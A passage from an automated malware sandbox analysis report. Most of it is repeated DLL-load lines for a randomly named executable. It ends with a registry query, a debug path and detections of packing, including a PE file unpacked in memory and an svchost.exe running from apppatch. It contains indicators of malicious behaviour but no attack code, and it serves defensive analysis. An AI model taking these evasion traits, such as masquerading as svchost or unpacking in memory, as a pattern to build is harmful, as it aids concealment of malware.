    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: dbghelp.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: netapi32.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: samcli.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: netutils.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: wininet.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: iertutil.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: profapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: winscard.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: sensapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: dbghelp.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: netapi32.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: samcli.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: netutils.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: wininet.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: iertutil.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: profapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: winscard.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: sensapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: dbghelp.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: netapi32.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: samcli.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: netutils.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: wininet.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: iertutil.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: profapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: winscard.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: sensapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: dbghelp.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: netapi32.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: samcli.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: netutils.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: wininet.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: iertutil.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: profapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: winscard.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: sensapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: dbghelp.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: netapi32.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: samcli.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: netutils.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: wininet.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: iertutil.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: profapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: winscard.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: sensapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: dbghelp.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: netapi32.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: samcli.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: netutils.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: wininet.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: iertutil.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: profapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: winscard.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: sensapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: dbghelp.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: netapi32.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: samcli.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: netutils.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: wininet.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: iertutil.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: profapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: winscard.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: sensapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: dbghelp.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: netapi32.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: samcli.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: netutils.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: wininet.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: iertutil.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: profapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: winscard.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: sensapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: dbghelp.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: netapi32.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: samcli.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: netutils.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: wininet.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: iertutil.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: profapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: winscard.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: sensapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: dbghelp.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: netapi32.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: samcli.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: netutils.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: wininet.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: iertutil.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: profapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: kernel.appcore.dll
    Source: C:\Users\user\Desktop\5AFlyarMds.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{304CE942-6E39-40D8-943A-B913C40C9CD4}\InprocServer32Jump to behavior
    Source: 5AFlyarMds.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: cUKxeliGgCix.exe, 00000005.00000000.2077994915.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 00000006.00000000.2078822725.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 00000008.00000002.2333587412.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 0000000D.00000000.2083432315.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 0000000F.00000002.2111175988.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 00000013.00000002.2111926666.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 00000015.00000000.2111093320.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 00000017.00000002.2119064943.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 00000019.00000000.2117612935.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 0000001B.00000002.2125197875.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 0000001D.00000002.2127871048.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 0000001F.00000000.2126229043.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 00000021.00000000.2129102058.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 00000023.00000000.2133478694.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 00000025.00000002.2142572120.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 00000027.00000002.2147362137.000000000059E000.00000002.00000001.01000000.00000009.sdmp

    Data Obfuscation

    barindex
    Detected unpacking (changes PE section rights)
    Source: C:\Users\user\Desktop\5AFlyarMds.exeUnpacked PE file: 0.2.5AFlyarMds.exe.400000.1.unpack .text:ER;.lm:W;.qaQL:W;.yP:R;.bPUeWG:R;.PaB:W;.data:W;.dOh:W;.HvNW:R;.pPJb:R;.bBut:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
    Source: C:\Windows\apppatch\svchost.exeUnpacked PE file: 1.2.svchost.exe.400000.0.unpack .text:ER;.lm:W;.qaQL:W;.yP:R;.bPUeWG:R;.PaB:W;.data:W;.dOh:W;.HvNW:R;.pPJb:R;.bBut:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
    Detected unpacking (creates a PE file in dynamic memory)
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeUnpacked PE file: 6.2.cUKxeliGgCix.exe.2550000.2.unpack
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeUnpacked PE file: 13.2.cUKxeliGgCix.exe.3100000.2.unpack
